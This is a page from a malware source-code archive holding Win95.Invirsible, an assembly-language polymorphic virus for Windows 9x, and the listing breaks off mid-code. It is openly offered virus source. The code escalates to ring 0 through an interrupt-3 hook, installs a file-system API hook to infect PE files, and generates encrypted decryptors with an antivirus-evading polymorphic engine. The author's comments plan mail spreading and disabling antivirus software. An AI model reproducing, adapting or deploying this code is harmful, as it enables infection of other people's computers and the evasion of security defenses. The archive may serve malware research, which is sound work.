ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
main
MalwareSourceCode/LegacyWindows/Win95/Win95.Invirsible.asm
TheDuchy d44d9b59a7 Folder structure change, added README
2020-10-16 22:28:58 +02:00

4174 lines
94 KiB
NASM
Raw Permalink Blame History

; Win95.Invirsible
; Bhunji
;
; proudly presents ;)
;
; Invirsible
;
; Virusinfo
; Version 2
; Size: Big, usually around 7.6k
; Infects: PE files
; Resident: Yes
; Systems; Win9x
; Polymorhic: Yes
; This is the second version on Invirsible. My goal with this virus
; is to make it as hard as possible to detect. It has one technique
; never seen in a virus before which I call the Guide technique. More
; info about this can be found at www.shadowvx.org. It carries a very
; advanced generic polymorpher. It is able to polymorph mov, add, sub
; so far but its trivial to add more instructions. The engine uses
; emulation to generate code. It is able to emulate memory and registers
; which results in code that looks very real. Coding new code to be
; polymorphed is pretty easy as it's similar to Intel asm.
; ex. mov RX1,[RX2]
; mov Random register 1, [Random register 2]
; Changes since last version
; A total rewrite of the polymorphic code. Works way better now.
; * Changed the polymorphic language to be more similar to Intel asm
; * Added memory emulation, the created code uses the end of .data segment.
; * Deleted advanced register emulation, did hardly create better code
; and was taking up lots of space.
; * Very generic, adding a new instruction needs 10 lines of data/code
; instead of 200-400 lines.
; * An optimiser that deletes the very worst code. (fx. mov eax,eax)
; * The linked list polymorpher will create a six different looking
; decryptors for the generic polymorpher.
; Some changes to the virus
; * Bugfixes. (Doesn't crash on infection :) )
; * Search for slackspace in .data segment. This space is used by the
; generated code to look more like real code.
; * Recompilation of the code before every infection to make the pointers
; point to the .data slack
; Things to be added in the future.
; * More instructions will be added to the polymorpher
; * A more powerful optimiser
; * Infect on NT too.
; * Spreading by mail
; * Infection of hlp files
; * EPO
; * Deregister the most common AV software on file but register it later in
; memory. This will not happen if the AV gives the virus its proper name.
; * A better method of upgrading the virus ala babylonia.
; And here is an example of what code the engine is able and has been
; able to generate.
; Version 1
; Version one is able to emulate/generate
; add, mov
s
; (code is taken from a generated Guide)
; mov ecx, 0Ch
; mov ebx, fs:[ecx] ; get random number
; mov edx, 0
; add edx, eax
; add eax, esi
; mov edi, 0
; add edi, 6472DAADh
; mov eax, 5A97451Fh
; mov eax, edx
; add edi, ecx
; mov ecx, 0
; add ecx, ebx
; or ecx, 8
; xor ebx, ecx ; 'and' ebx,8
; add edi, 0DCA7B4AAh
; add edi, 60E4CB5Ch
; mov edi, ebx
; add ebx, offset jumptable ; add ebx, offset jumptable
; jmp dword ptr [ebx]
; patterns
; Differences from the trash code
; fs:[register]
; or/and register,8
; jmp [register]
; The trashcode
; very few instructions
; no memory instructions
; the same amount of every emulateable instruction (normal code has more
; movs then adds for example)
; unnecessary instructions. Ex.
; mov eax, 5A97451Fh ; this is unnessesary
; mov eax, edx ; as this overwrites eax again
; Version 2
; Version two is able to emulate
; add, sub, mov, and, or, xor and memory
; Generates on average more movs then the
; adds and more adds then the other opcodes.
; Generates more registers then memory operands and
; more memory operands then numbers.
; The end result 'feels' more like regular code.
; Many many bugfixes. (There are no more bugs i hope)
; Code is taken from a generated decryptor
;
; mov edx, 8D403766h
; xor [4030D7], 1A45h ; 1a45 = virussize
; xor esi, [4030CF]
; mov [4030CF], ecx
; mov esi, 45BBA054h
; add edi, 0CCFC6B5Bh
; mov ebx, 1A45h ; first "real" instruction
; mov eax, [4030CF]
; sub edi, 1A45h
; or eax, ebx
; mov edi, 1A45h
; mov edi, 3
; add ecx, 3
; mov edx, [4030BF] ; second
; add [4030D7], eax
; mov esi, 3
; DecryptLoop:
; pusha ; will be deleted in future versions
; mov eax, 1FF5893Dh
; mov ecx, ebx
; sub eax, 0E138ABECh
; add edx, ecx ; third
; mov esi, ecx
; mov edi, ebx
; mov eax, 0D6E7BEF5h
; mov [4030CF], 5493B89Ch
; sub ecx, [4030B3]
; mov eax, 0E138ABECh
; and [4030D3], ecx
; or eax, ebx
; xor [edx], 0E138ABECh ; decrypt code
; mov [4030D7], 0E138ABECh
; popa
; sub ebx, 4 ;
; jnb DecryptLoop
; mov dword_0_4030CF, 69472C81h
; mov ecx, 0F5D970C4h
; mov edi, 1
; mov eax, dword_0_4030B7
; add ecx, 8244076Eh
; If we put the real code pieces together we get.
;
; mov ebx, 1A45h ; VirusSize
; mov edx, [4030BF] ; Where to start decrypt
; DecryptLoop:
; add edx, ecx ; third
; xor dword ptr [edx], 0E138ABECh ; decrypt code
; sub ebx, 4 ;
; jnb DecryptLoop
; The third instruction should add "Where to start" with "VirusSize" but
; as you can see it is added with ecx instead, this is because of the
; emulation. The engine knows that ecx = ebx = VirusSize so it used ecx
; instead.
; patterns
; Differences from the trash code
; pushad/popad ; easy to delete
; [Register] ; engine is only able to create [Number]
; jxx ; Engine isnt able to create jumps yet
; The trashcode
; Still to few instructions, needs push/pop, call, jmp, jxx to look at least
; something like real code.
; Memory instructions isn't able to create memory pointers with a register
; inside, eg [Number+register]. A better compiler will fix this.
; Still unnecessary instructions. Ex.
; mov eax, 0D6E7BEF5h ; this is unnessesary
; ...
; mov eax, 1FF5893Dh ; as this overwrites eax again
;
; Greetings
; (M)asmodeus. Dropper.exe has generated errors and will be closed by
; Windows :)))
; Morphi Hoppas att du f<>r det b<>ttre i helsingborg
; Prizzy Thanks for helping me with the bug
; Ruzz Yes, i have FINALY finished it :)
; Kamaileon. I wish you luck with the windows programming.
; Clau Hello sister ;)
; Urgo32 Good luck with your next virus.
includelib kernel32.lib
includelib user32.lib
include c:masmincludewindows.inc
.486
.model flat, stdcall
ExitProcess PROTO ,:DWORD
MessageBoxA PROTO ,:DWORD,:DWORD,:DWORD,:DWORD
; Primes, used them in the first version for advanced register emulation,
; might be usefull in the future
Prime1 equ 2
Prime2 equ 3
Prime3 equ 5
Prime4 equ 7
Prime5 equ 11
Prime6 equ 13
Prime7 equ 17
Prime8 equ 19
Prime9 equ 23
Prime10 equ 29
Prime11 equ 31
Prime12 equ 37
Prime13 equ 41
Prime14 equ 43
Prime15 equ 47
Prime16 equ 53
Prime17 equ 59
Prime18 equ 61
Prime19 equ 67
Prime20 equ 71
Prime21 equ 73
Prime22 equ 77
.data
VirusStr db "No crack found",0
.code
ProgramMain:
push 0
call ExitProcess
_rsrc segment para public 'DATA' use32
assume cs:_rsrc
VirusStart:
Main:
mov ebx,[esp]
push ebp
call GetDelta
GetDelta:
pop ebp
sub ebp,offset GetDelta ; address
mov [Temp+ebp],ebx ; save offset into kernel
.if ebp!=0 ; code that isn't
; executed in the first
; version
mov eax,[eax] ; polymorphic code will
mov [InfectedProgramOffset+ebp],eax ; move pointer to
.endif ; programstart in eax
lea eax,BreakPoint1
lea eax,[ebp+GetDelta] ; move some address to
mov [PointerToDataSlack+ebp],eax ; PTDS, doesnt matter as
; long as its a working one
; mov eax,fs:[0c]
db 67h,64h,0a1h,0ch,00h ; get random number
add [RandomNumber+ebp],eax ; (is not random on NT)
call GetAPIFunctions ; Get needed API functions
call FixTables ; clean the 'dirty' tables
; and allocate mem for the
; polymorpher
call CreateGuideAndDecryptor ; Generate the polymorphic
; code
call GetResident ; intercept IFSMgr to get
; filenames to infect
ReturnToHost:
push [MemPtr+ebp] ; free allocated mem used
call [LocalFree+ebp] ; by polymorpher
mov eax,[InfectedProgramOffset+ebp] ; program address
pop ebp ; restore ebp
jmp eax ; jmp to program
Topic db "You can not find what you can not see.",0
db "Invirsible by Bhunji (Shadow VX)",0
VSize equ VirusEnd-VirusStart
VirusSize equ VSize
; how much stack and mem should the polymorpher use
NumberOfOffsets equ 10 ; more size = better code
; (doesnt matter right now
; because the engine isnt
; able to create jumps)
StackSize equ 100 ; (doesnt matter right now
; because the engine isnt
; able to emulate the stack)
MemorySize equ 10 ; The more size the better
; code is produced but makes
; it harder to find a file to
; infect
LinesOfTrash equ 3 ; LinesOfTrash is the
; aproximate numbers of
; random instructions between
; every "legal" instruction
; LinesOfTrash
; Fixup instruction
; LinesOfTrash
EndValueFrecuency equ 1 ; the higher the more often
; is the EndValue chosed
; the higher the number is
; the harder is it to detect
; my looking at one
; instruction, but its easier
; to detect by looking at many
; instructions.
; 1 is a perfect value
MemPtr dd 0 ; ptr to allocated mem
ReturnAddress dd 0 ; stores the return address
; in some functions
InfectedProgramOffset dd ProgramMain ; where to jump when
; done
Temp dd 0 ; just a temporary variable
; API's the virus uses
WinFunctions:
lstrlenStr db "lstrlen",0
LocalAllocStr db "LocalAlloc",0
LocalFreeStr db "LocalFree",0
db 0
; pointers to these
Functions:
lstrlen dd ?
AllocMem dd ?
LocalFree dd ?
FixTables:
lea edi,[ZeroRegStart+ebp]
mov ecx,(ZeroRegEnd-ZeroRegStart)/4
xor eax,eax
rep stosd
lea edi,[RandomRegs+ebp]
mov ecx,Registers
dec eax
rep stosd
lea edi,[SavedOffsets+ebp]
mov ecx,NumberOfOffsets
rep stosd
lea eax,[EaxTable+ebp]
mov [Tables+ebp],eax
mov eax,MemorySize*20+StackSize*20
push eax
push LMEM_FIXED + LMEM_ZEROINIT
call [AllocMem+ebp]
mov [Tables+ebp+4],eax
add eax,MemorySize*20
mov [Tables+ebp+8],eax
call UndefineRegistersAndMem
xor eax,eax
lea esi,[Mem1Table+ebp]
mov edi,[Tables+ebp+4]
lodsb
mov ecx,eax
PredefinedMem:
lodsb
push edi
imul eax,eax,20
lea edi,[edi+eax]
push ecx
mov ecx,5
rep movsd
pop ecx
pop edi
loop PredefinedMem
ret
UndefineRegistersAndMem:
lea edi,[EaxTable+ebp+4*4]
mov ecx,Registers
mov eax,Writeable+Undefined
SetOpcodeInfo1:
stosd
add edi,4*4
loop SetOpcodeInfo1
mov edi,[Tables+ebp+4]
add edi,4*4
mov ecx,MemorySize+StackSize
mov eax,Writeable+Undefined
SetOpcodeInfo2:
stosd
add edi,4*4
loop SetOpcodeInfo2
ret
GetModuleHandle dd 0
GetProcAddress dd 0
GetProcAddressStr db "GetProcAddress",0
GetAPIFunctions:
mov eax,[Temp+ebp]
call GetModuleHandleAndProcAddress
mov [GetModuleHandle+ebp],eax
mov [GetProcAddress+ebp],ebx
xor edx,edx
lea edx,[WinFunctions+ebp]
xor ecx,ecx
CopyWinApiFunctions:
push edx
push ecx
push edx
push edx
push [GetModuleHandle+ebp]
call [GetProcAddress+ebp]
mov ecx,[esp+4]
mov [Functions+ebp+ecx],eax
call [lstrlen+ebp]
pop ecx
pop edx
add edx,eax
add ecx,4
inc edx
cmp byte ptr [edx],0
jnz CopyWinApiFunctions
NoMoreApis:
ret
; Input
; eax = somewhere in kernel
; Returns
; eax = GetModuleHandler offset
; ebx = GetProcAddress offset
GetModuleHandleAndProcAddress:
and eax,0fffff000h ; even 1000h something
FindKernelEntry:
sub eax,1000h
cmp word ptr [eax],'ZM'
jnz FindKernelEntry
mov ebx,[eax+3ch]
cmp word ptr [ebx+eax], 'EP'
jne FindKernelEntry
mov ebx,[eax+120+ebx]
add ebx,eax ; ebx -> Export table
mov ecx,[ebx+12] ; ecx -> dll name
cmp dword ptr [ecx+eax],'NREK'
jz FindGetProcAddress
jmp FindKernelEntry
; We can now be sure that eax points to the kernel
FindGetProcAddress:
lea edi,[GetProcAddressStr+ebp]
mov edx,[ebx+32]
FindFunction:
add edx,4
mov ecx,15 ; length of GetProcAddress,0
mov esi,[edx+eax]
push edi
add esi,eax
repz cmpsb
pop edi
jne FindFunction
sub edx,[ebx+32]
shr edx,1 ; ecx = ordinal pointer
lea esi,[edx+eax]
xor ecx,ecx
add esi,[ebx+36] ; esi = base+ordinals+ordnr
mov cx,word ptr [esi] ; ecx = ordinal
shl ecx,2 ; ecx = ordinal*4
add ecx,[ebx+28] ; ecx = ordinal*4+func tbl addr
mov ebx,[ecx+eax] ; esi = function addr in file
add ebx,eax ; esi = function addr in mem
ret
Encryptor dd 0
GetResident:
mov eax,[GetModuleHandle+ebp]
add eax,6ch
mov ebx,'.K3Y'
cmp [eax],ebx
jz DontGoRing0
sub esp,8
sidt [esp] ; get interupt table
; hook int 3 to get get ring 0
mov esi,[esp+2]
add esi, 3*8 ; pointer to int 3
mov ebx, [esi+4]
mov bx,word ptr [esi] ; ebx = old pointer
lea eax,[Ring0Code+ebp] ; eax = new pointer
mov word ptr [esi],ax ; move new pointer to int 3
shr eax,16
mov word ptr [esi+6], ax
pushad
int 3 ; get into ring 0
popad
mov [esi],bx ; return old pointer again
shr ebx,16
mov [esi+6],bx
add esp,8
DontGoRing0:
ret
; ---------------------------------------
; -------------------------------- Ring 0
; ---------------------------------------
Ring0Code:
mov eax,[GetModuleHandle+ebp]
add eax,6ch
mov ebx,'.K3Y'
mov [eax],ebx
mov ebx,[eax+8]
mov [eax+4],ebx
mov eax,[MemoryTable+ebp]
sub eax,[GuidePos+ebp]
push eax
add eax,(MemorySize+1)*8
push eax ; push guide + decrypt size
; + special variables
add eax,(VirusEnd-VirusStart)*2+20
; allocate mem
push eax
push R0_AllocMem
mov edi,ebp
call vxd
pop ecx
test eax,eax
jz ErrorRing0
; Copy guide and decryptor to ring 0 mem
pop ecx ; ecx = guide + decrypt size
; + special variables
mov esi,[GuidePos+ebp]
mov edi,eax
mov ebx,eax
xchg ebx,[GuidePos+ebp] ; eax = new guide pos
; ebx = old guide pos
pop edx ; edx = size of guide+decrypt
add edx,eax ; edx = new memory pos
mov [MemoryTable+ebp],edx
sub eax,ebx ; difference in mem
add [DecryptorPos+ebp],eax ; add to get new pos
rep movsb ; copy polycode to ring 0
mov edi,edx
mov ecx,(MemorySize+1)*(8/4)
xor eax,eax
rep stosd
add edx,MemorySize*4+4
mov [VirtualDataSegment+ebp],edx
pushad
mov eax,[VirtualDataSegment+ebp] ; pointer to virtual data
; segment
lea edx,[Mem1Table+ebp]
movzx ecx,byte ptr [edx] ; how much data does the
; decryptor and guide need
; predefined
inc edx
CopyDataToVirtualDataSegment:
movzx ebx,byte ptr [edx] ; where in datasegment should
; we write the data
shl ebx,2
push dword ptr [edx+1] ; push the data to write
pop [eax+ebx] ; write it to virtual data seg
add edx,1+5*4 ; point to next data block
loop CopyDataToVirtualDataSegment
popad
mov [VirusInRing0Mem+ebp],edi
mov ebx,edi
lea esi, [ebp+VirusStart]
mov ecx, VirusSize
rep movsb ; copy virus to ring 0
xor eax,eax
stosd
stosd
; encrypt virus in memory
pushad
mov esi,[Encryptor+ebp]
push ebx ; pointer to virus in ring0
mov eax,esp
push eax ; pointer to pointer
push eax
push eax
push eax
mov [PointerToDataSlack+ebp],esp ; all special variables
; points to pointer to
; virus in ring 0
call Compile
call esi
add esp,5*4
popad
; copy residentcode to mem
push edi
lea esi, [ebp+ResidentcodeStart]
mov ecx, ResidentcodeEnd-ResidentcodeStart
rep movsb
; hook API function
; edi is on stack
push InstallFileSystemAPIhook
mov edi,ebp
call vxd
pop edi ; 0 edi left on stack
sub edi,ResidentcodeStart
mov [edi+BasePtr+1],edi
mov [edi+OldAPIFunction],eax
BreakPoint1:
lea eax,[edi+BreakPoint]
lea eax,[edi+BreakPoint]
iretd
ErrorRing0:
pop eax
xor eax,eax
iretd
CreateGuideAndDecryptor:
push 1024*1024
push LMEM_FIXED + LMEM_ZEROINIT
call [AllocMem+ebp]
mov [MemPtr+ebp],eax
mov edi,eax
lea esi,[Guide+ebp]
call LinkedListPolymorpher
call Polymorph ; create Guide
mov [GuidePos+ebp],esi
mov [GuideSize+ebp],eax
add edi,32
lea esi,[Decryptor+ebp]
call LinkedListPolymorpher
push esi
call Polymorph ; create Decryptor
mov [DecryptorPos+ebp],esi
mov [MemoryTable+ebp],edi
mov [DecryptorSize+ebp],eax
call UndefineRegistersAndMem
mov [HowMuchTrash+ebp],0
pop esi
pushad
mov edi,esi
mov eax,Op_trash
bswap eax
xor ecx,ecx
xor edx,edx
FindTrashInstruction:
inc edi
cmp [edi],edx
jz EndOfTrashInstructions
xor ecx,ecx
cmp [edi],eax
jnz FindTrashInstruction
add edi,4
push eax
xor eax,eax
stosb
pop eax
jmp FindTrashInstruction
EndOfTrashInstructions:
test ecx,ecx
jnz ReallyEnd
inc ecx
add edi,3
jmp FindTrashInstruction
ReallyEnd:
popad
add edi,eax
call MutateCode ; Generic polymorphing
mov ecx,edi
sub ecx,esi
shr ecx,1
mov edi,esi
FindDecryptInstruction:
mov eax,'R['
repnz scasw ; find [R
inc edi
mov ax,word ptr [edi]
cmp eax,',]' ; is this [Rx],
jnz FindDecryptInstruction ; if not, continue looking
and edi,0fffffff0h
mov eax,[edi]
bswap eax
.if eax==Op_xor
jmp CompileEncryptor
.elseif eax==Op_add
mov eax,Op_sub
bswap eax
stosd
jmp CompileEncryptor
.else
mov eax,Op_add
bswap eax
stosd
jmp CompileEncryptor
.endif
CompileEncryptor:
mov [Encryptor+ebp],esi
ret
; ---------------------------------------------------
; --------------------------- The generic polymorpher
; ---------------------------------------------------
; esi = Data to polymorph
; edi = where to put the created data
; Returns
; esi = start of created data
; edi = end of created data/start of created code
; eax = size of the created code
; Defined opcode looks
Op_add equ 'add '
Op_and equ 'and '
Op_mov equ 'mov '
Op_or equ 'or '
Op_sub equ 'sub '
Op_xor equ 'xor '
Op_cmp equ 'cmp '
Op_jnz equ 'jnz '
Op_jnb equ 'jnb '
Op_jna equ 'jna '
Op_jmp equ 'jmp '
Op_offset equ 'ofs '
Op_db equ 'db ' ; output whats in there,
; dont polymorph,
; dont compile
Op_dontparse equ '!emu' ; dont polymorph only
; compile
; special opcodes
Op_encrypt equ 'cpt ' ; encrypt this operand,
; used to create encryptor/
; decryptor
Op_setinfo equ 'nfo ' ; set info of operand
; used to define a operand
; changable or similar.
Op_prefix equ 'pfx ' ; prefix, eg fs:, es: and
; similar. Will be deleted
; in future versions
Op_trash equ 'trsh' ; how mush trash to be
; produced, use wisely
; to make your code better
; or when you need to save
; the flags
LinkedListPolymorpher:
call TablePolymorpher ; 'old' style polymorphics
; esi -> created data
; edi -> created data+sizeof (created data)+1
ret
Polymorph:
add edi,16
and edi,0fffffff0h
push edi
push edi
call MutateCode ; Generic polymorphing
pop edi
; esi -> created data
call Optimize ; Optimize the created code
; esi -> created data
; edi -> created data+sizeof (created data)+1
push edi
call Compile ; compile the code to get
; the size
pop edi
pop esi
ret
Regs equ 6
Registers equ Regs
InfoPtr equ 16
; This polymorher is a bit different from the usuall one.
; It's able to create code that does different things, not just
; the same with a different look.
TablePolymorpher:
; A nice recursive function :)
xor eax,eax
xor ecx,ecx
push edi
push 0
ReadInstruction: ; 'execute' function
mov cl, byte ptr [esi] ; How many bytes to output
inc esi
rep movsb
ParseCall: ; end of this function,
; should we call an other
lodsb
test eax,eax
jz ReturnFromCall ; no, return
lea ebx,[esi+eax*4]
push ebx ; push return address
call Random
mov esi,[esi+eax*4] ; address of the function
add esi,ebp
jmp ReadInstruction ; jmp to function 'executer'
ReturnFromCall:
pop esi ; return from main function
test esi,esi
jnz ParseCall
NoMoreParsing:
xor eax,eax
stosd
stosd
pop esi
ret
Decryptor:
db 0
db 1
dd R0VSize
; dd R0Zero
db 1
dd MovePoinerToProgramStart
db 0
MovePoinerToProgramStart:
db MovePoinerToProgramStartEnd-$-1
db "trsh",LinesOfTrash
db "mov R1,[N"
dd 1
db "]"
MovePoinerToProgramStartEnd:
db 0
R0VSize:
db R0VSizeEnd-$-1
db "mov RX0,N"
dd VSize
R0VSizeEnd:
db 2
dd R1VirusStart
dd R1VirusEnd
db 1
dd EncryptRX1
db 1
dd SubR0AndJump
db 0
SubR0AndJump:
db SubR0AndJumpEnd-$-1
db "db ",1 ; Bytes not to be morphed
popad
db "trsh",0
db "sub RX0,N"
dd 4
db "!emu",9 ; dont do anything about this
db "jnb N"
dd 0
SubR0AndJumpEnd:
db 0
R0Zero:
db R0ZeroEnd-$-1
db "mov RX0,N"
dd 0
R0ZeroEnd:
db 2
dd R1VirusStart
dd R1VirusEnd
db 1
dd EncryptRX1
db 1
dd AddR0AndJump
db 0
AddR0AndJump:
db AddR0AndJumpEnd-$-1
db "db ",1 ; Bytes not to be morphed
popad
db "add RX0,N"
dd 4
db "trsh",0
db "!emu",13 ; dont do anything about this
db "cmp RX0,N"
dd VSize
db "!emu",9 ; dont do anything about this
db "jna N"
dd 0
AddR0AndJumpEnd:
db 0
R1VirusStart:
db R1VirusStartEnd-$-1
db "mov RX1,[N"
dd 3
db "]"
db "ofs 0"
db "db ",1
pushad
db "nfo RX2"
dd Undefined
db "add RX1,RX0"
R1VirusStartEnd:
db 0
R1VirusEnd:
db R1VirusEndEnd-$-1
db "mov RX1,[N"
dd 3
db "]"
db "add RX1,N"
dd VSize
db "ofs 0"
db "db ",1
pushad
db "nfo RX2"
dd Undefined
db "sub RX1,RX0"
R1VirusEndEnd:
db 0
EncryptRX1:
db 0
db 1
dd RandomReg
db 0
OpcodeXor:
db 4
db "xor "
db 0
OpcodeAdd:
db 4
db "add "
db 0
OpcodeSub:
db 4
db "sub "
db 0
RandomReg:
db 0
db 1
dd RandomOpcode
db 1
dd RandomizeMemWithReg
db 0
RandomizeMemWithReg:
db RandomizeMemWithRegEnd-$-1
db "[RX1],N"
RandomNumber dd 0
RandomizeMemWithRegEnd:
db 0
RandomOpcode:
db 0
db 3
dd OpcodeXor
dd OpcodeAdd
dd OpcodeSub
db 0
Guide:
db DefinedTrash-$-1
db "trsh",LinesOfTrash
DefinedTrash:
db 1
; dd RandomEveryBoot
dd RandomEveryTime
db 1
dd MakeZeroOrEight
db 0
RandomEveryTime:
db RandomEveryTimeEnd-$-1
db "pfx ",64h ; prefix fs:
db "mov RX0,[N"
dd PointerToRandomMemory
db "]" ; mov X0, fs:[0ch]
RandomEveryTimeEnd:
db 0
RandomEveryBoot:
db RandomEveryBootEnd-$-1
db "nfo R"
RandomEveryBootEnd:
db 3
dd RndEcx
dd RndEdi
dd RndEsi
db 0
RndEcx:
db RndEcxEnd-$-1
db "3"
dd Undefined
db "mov RX0,R3"
RndEcxEnd:
db 0
RndEdi:
db RndEdiEnd-$-1
db "5"
dd Undefined
db "mov RX0,R5"
RndEdiEnd:
db 0
RndEsi:
db RndEsiEnd-$-1
db "6"
dd Undefined
db "mov RX0,R6"
RndEsiEnd:
db 0
MakeZeroOrEight:
db MakeZeroOrEight-$-1
db "and RX0,N"
dd 8
db "add RX0,[N" ; special variable 1 =
dd 1 ; pointer to jump table
db "]"
db "jmp [RX0]" ; jmp [X0]
MakeZeroOrEightEnd:
db 0
; ---------------------------------------------
; ---------------- MutateCode -----------------
; ---------------------------------------------
; ------------- Local variables
Prefix dd 0
EndWhere:
Trash dd 0
ToReg dd 0
ToMemValue dd 0
ToMemReg dd 0
FromWhere:
FromValue dd 0
FromReg dd 0
FromMemValue dd 0
FromMemReg dd 0
TempWhere:
TempValue dd 0
TempReg dd 0
TestMemValue dd 0
TestMemReg dd 0
Temp1 dd 0
Temp2 dd 0
Writeable equ 1b
Undefined equ 10b ; is has a unknown value
Uninitialized equ -1
TableSize equ EbxTable-EaxTable
EndValue dd 0
EndTypeOfValue dd 0
Tables: ; pointers to the different
; tables
RegTables dd EaxTable
MemoryTables dd 0 ; Is allocated later
StackTables dd 0 ; first table is EspTable
EaxTable:
EaxValueNumber dd 0
EaxValueReg dd 0
EaxMemoryNumber dd 0
EaxMemoryReg dd 0
EaxInformation dd Undefined+Writeable
EbxTable:
dd 0,0,0,0, Undefined+Writeable
EcxTable:
dd 0,0,0,0, Undefined+Writeable
EdxTable:
dd 0,0,0,0, Undefined+Writeable
EsiTable:
dd 0,0,0,0, Undefined+Writeable
EdiTable:
dd 0,0,0,0, Undefined+Writeable
; this table is copied to mem, its used to define
; starting values for the memory
; Undefined mem start as Undefined+Writeable (you could change this to
; only writable for slightly better code.)
Mem1Table:
db 4 ; how many tables
db 0 ; which table
dd 0,0,0,0, Undefined ; program entry point
db 1
dd 0,0,0,0, Undefined ; pointer to mem 0
db 2
dd 0,0,0,0, Undefined ; decryptor entry point
db 3
dd 0,0,0,0, Undefined ; where to start decrypt
RandomRegs:
dd Registers dup (-1) ; Random Regs
; mutates the code in esi and places the result in edi
; returns a pointer to the created code in esi
; returns a pointer to the created code + sizeof(created code) in edi
MutateCode:
push edi
MorphCodeLoop:
xor eax,eax
dec eax
push edi
lea edi,[ebp+EndWhere]
mov ecx,8
rep stosd
pop edi
call Parse
jmp MorphCodeLoop
MutateEnd:
pop eax ; return address of Parse
pop esi
add esi,16
and esi,0fffffff0h
add edi,10
ret
; ----------------------- Parser
ParseSpecialVariables:
dd (ParseSpecialVariablesEnd-ParseSpecialVariables-4)/4+1
dd Op_db, Op_encrypt, Op_setinfo, Op_offset, Op_prefix
dd Op_trash,Op_dontparse,Op_jmp
ParseSpecialVariablesEnd:
ParseSpecialProcedures:
dd ParseDeclareByte, ParseEncrypt, ParseChangeInfo
dd ParseSaveOffset, ParsePrefix, ParseTrash, ParseDontParse
dd TemporaryParseJump
ParseSpecialProceduresEnd:
ParseInstructionData:
dd (ParseInstructionDataEnd-ParseInstructionData-4)/4+1
dd Op_add, Op_mov, Op_sub, Op_or, Op_xor, Op_and
ParseInstructionDataEnd:
AddPos equ 0
MovPos equ 1
SubPos equ 2
OrPos equ 3
XorPos equ 4
AndPos equ 5
InstructionData:
AddInfo:
dd offset AddInstruction
dd Op_add
MovInfo:
dd offset MovInstruction
dd Op_mov
SubInfo:
dd offset SubInstruction
dd Op_sub
OrInfo:
dd offset OrInstruction
dd Op_or
XorInfo:
dd offset XorInstruction
dd Op_xor
AndInfo:
dd offset AndInstruction
dd Op_and
InstuctionTablesEnd:
Parse:
push edi
mov ecx,[ParseSpecialVariables+ebp]
lea edi,[ParseSpecialVariables+ebp+4]
lodsd
bswap eax
repnz scasd
test ecx,ecx
jz ParseInstruction
pop edi
lea ebx,[ParseSpecialProceduresEnd+ebp]
imul ecx,ecx,4
sub ebx,ecx
mov ebx,[ebx]
add ebx,ebp
jmp ebx
ParseDeclareByte:
mov edx,Op_db
call OutputOnlyOpcode
xor eax,eax
lodsb
mov ecx,eax
stosb ; number of bytes to declare
rep movsb
ret
ParseEncrypt:
call GetOperand
ret
ParseChangeInfo:
mov eax,666666h
call GetOperand
mov ecx,eax
lodsd
xchg eax,ecx
call ChangeInfo
ret
ParseSaveOffset:
mov edx,Op_offset
call OutputOnlyOpcode
movsb
ret
ParsePrefix:
xor eax,eax
lodsb
mov [Prefix+ebp],eax
ret
ParseTrash:
xor eax,eax
lodsb
mov [HowMuchTrash+ebp],eax
ret
ParseDontParse:
xor eax,eax
lodsb
mov ecx,eax
add edi,16
and edi,0fffffff0h
rep movsb
ret
TemporaryParseJump:
add edi,16
and edi,0fffffff0h
call OutputPrefix
mov eax,Op_jmp
bswap eax
stosd
call GetOperand
add eax,'0'
add eax,']'*256
shl eax,16
mov ax,'R['
stosd
ret
ParseInstruction:
mov ecx,[ParseInstructionData+ebp]
lea edi,[ParseInstructionData+ebp+4]
repnz scasd
pop edi
test ecx,ecx
jz MutateEnd
lea ebx,[InstuctionTablesEnd+ebp]
imul ecx,ecx,8
sub ebx,ecx
push ebx
ParseOperands:
call GetOperand
sub ebx,4
push ebx ; ToType
push eax ; ToOperand
inc esi
call GetOperand
push ebx ; FromTypeOfValue
push eax ; FromOperand
mov [EndValue+ebp],eax
mov [EndTypeOfValue+ebp],ebx
call GenerateTrash
mov eax,[esp+8] ; ToOperand
mov ebx,[esp+12] ; ToType
mov ecx,Writeable
call DeleteFromInfo
pop [FromOperand+ebp]
pop [FromTypeOfValue+ebp]
pop eax
pop ebx
mov [ToOperand+ebp],eax
mov [ToType+ebp],ebx
mov ecx,Writeable
call DeleteFromInfo
pop [EmulateInstruction+ebp]
call OutputPrefix
call EmuProc
call GenerateTrash
ret
; return
; eax = register or number
; ebx =
; 0 = value/number
; 4 = value/register
; 8 = memory/number
; 12 = memory/register
; return
; EBX = 0 if value and 4 if memory
; |'V' or 'M'
; |
; db "M"
ReadTypeOfData:
xor eax,eax
xor ebx,ebx
lodsb
cmp al,'M'
sete bl
shl bl,3
ret
; return
; EAX = the number or register
; EBX = 0 if number and 4 if register
; This procedure is in the "copy to ring 0" mem.
;GetOperand:
; xor edx,edx
; mov al,byte ptr [esi]
; cmp al,'['
; setz dl
; mov ecx,edx
; add esi,edx
; shl edx,3
; mov ebx,edx ; ebx = 0 or 8
; lodsb
; cmp al,'S' ; A variable
; jnz Label53
; mov eax,[PointerToDataSlack+ebp]
; mov edx,[esi]
; mov eax,[eax+edx*4]
; mov [esi],eax
; mov eax,'V'
; xor edx,edx
;
; Label53:
; cmp al,'R'
; setz dl
; shl edx,2
; add ebx,edx ; ebx = ebx + (0 or 4)
;
; test edx,edx ; is value
; jz ReadValue
;
; xor eax,eax
; lodsb ; read register
; cmp al,'X'
; jz GetRandomReg
; sub eax,'0'
; add esi,ecx
; ret
; ReadValue:
; lodsd
; add esi,ecx
; ret
GetRandomReg:
push ebx
call AsciiToNum
add esi,ecx
shl eax, 2
lea eax,[eax+ebp+RandomRegs] ; eax -> RandomReg
mov ebx,[eax]
cmp ebx,Uninitialized
jz GetRandomRegPtrInitialize ; There is no RnR
; Xx, create one
xchg eax,ebx ; eax = Xx
pop ebx
ret
GetRandomRegPtrInitialize:
push eax
call GetWriteableReg
pop ebx
mov [ebx],eax ; Mov RR,Random Operand
pop ebx
ret
; -----------------------------------------------
; ---------------------------- Generic polymorher
; -----------------------------------------------
; This proc takes data from WhereFrom and WhereTo and
; creates instructions from that data.
HowMuchTrash dd LinesOfTrash
RandomProcs:
db 6 ; number of instructions
db 6 ; how often it should come up
db 2
db 1
db 1
db 1
db 1
dd MovPos
dd AddPos
dd SubPos
dd OrPos
dd XorPos
dd AndPos
GenerateTrash:
